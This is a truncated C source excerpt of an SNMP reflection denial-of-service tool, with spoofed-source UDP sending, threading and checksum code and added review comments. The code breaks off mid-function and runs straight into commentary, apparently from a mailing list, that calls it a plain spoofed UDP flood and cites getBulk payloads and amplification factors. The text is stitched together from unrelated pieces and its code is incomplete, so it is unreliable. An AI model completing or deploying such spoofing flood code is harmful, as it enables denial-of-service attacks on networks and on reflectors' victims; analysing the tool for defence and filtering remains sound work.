/* For educational purposes only */
/* The author of this code is not responsible for the use of this proof of concept tool */
#include <stdio.h>
#include <netinet/ip.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/udp.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/types.h>
#include <pthread.h>
/* Build-time switches. DEBUG is left commented out, so it is undefined by
 * default; removing the leading `//` on the next line defines it. */
//#define DEBUG // uncomment if you want to see debugging messages
/* Thread-count limit. The code that reads it is not visible in this excerpt. */
#define MAXTHREADS 4 // Maximum number of threads
/* 161/udp is the standard SNMP agent port. */
#define SNMPPORT 161 // Destination SNMP port (default)
/*
 * Parameter bundle: one descriptor, one file name and two 32-bit-wide
 * address fields. The code that fills and reads these fields is not
 * visible in this excerpt, so the per-field notes are inferred from the
 * names only.
 */
struct args {
	int socket;      /* presumably a socket descriptor; confirm against users */
	char *filename;  /* presumably a path to an input file; confirm against users */
	unsigned srcip;  /* presumably an IPv4 source address; byte order not shown */
	unsigned dstip;  /* presumably an IPv4 destination address; byte order not shown */
};

/* File-scope object sharing the tag's name (tentative definition). */
struct args args;
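/*
 * Forward declarations. Only the start of in_cksum's definition is visible
 * in this excerpt; the other definitions are not shown, so the notes below
 * describe the declared signatures rather than their behaviour.
 */

/*
 * Declare the tag at file scope before it appears in a parameter list.
 * Without this line, the `struct snmp_s` named in the two list prototypes
 * below has prototype scope only, which makes it a distinct type that is
 * incompatible with any later file-scope definition of struct snmp_s.
 */
struct snmp_s;

/* Takes a pointer to 16-bit words and a length; returns a 16-bit value.
 * The name suggests the Internet checksum (confirm against the full body). */
unsigned short in_cksum(unsigned short *addr, int len);

/*
 * Takes a descriptor, an explicit source address/port, a destination
 * address/port and a payload buffer with its length.
 * NOTE(review): the source address is a caller-supplied parameter, and the
 * accompanying write-up describes the requests as spoofed. Source-address
 * validation at the network edge (BCP 38 ingress/egress filtering) is the
 * control that stops such datagrams from leaving a network.
 */
void send_udp(int sfd, unsigned int src, unsigned short src_p,
              unsigned int dst, unsigned short dst_p, char *buffer, int len);

/*
 * NOTE(review): empty parentheses declare a function with unspecified
 * parameters, so calls are not type-checked. If this is used as a pthread
 * start routine the prototype should be `void *drdos(void *)`; confirm
 * against the definition before changing it.
 */
void *drdos();

/* List helpers operating on struct snmp_s nodes (layout not shown here). */
void add_snmp_s(void);
int snmp_s_length(struct snmp_s *list);
void push_ip(struct snmp_s **first_s_ref, unsigned int ip);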
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft=len;
register unsigned short *w=addr;
register int sum=0;
unsigned short answer=0;
The quoted code is actually nothing more than a regular threaded UDP
flood DoS tool: the spoofed SNMP requests and the responses are both 65
bytes (no reflection). A simple network capture will verify this.
The payload is a misused .1.3.6.1 getBulk SNMP request that results in a
null-value response.
A sample perl script with the biggest reflection factor per transaction
achieved on Cisco devices is available here [1] (Amplification = 84
bytes request / 1480 bytes response).
For more information about SNMP reflection DoS you may refer to this
link [2].
The quoted code reminds me of an old implementation of the same concept [3].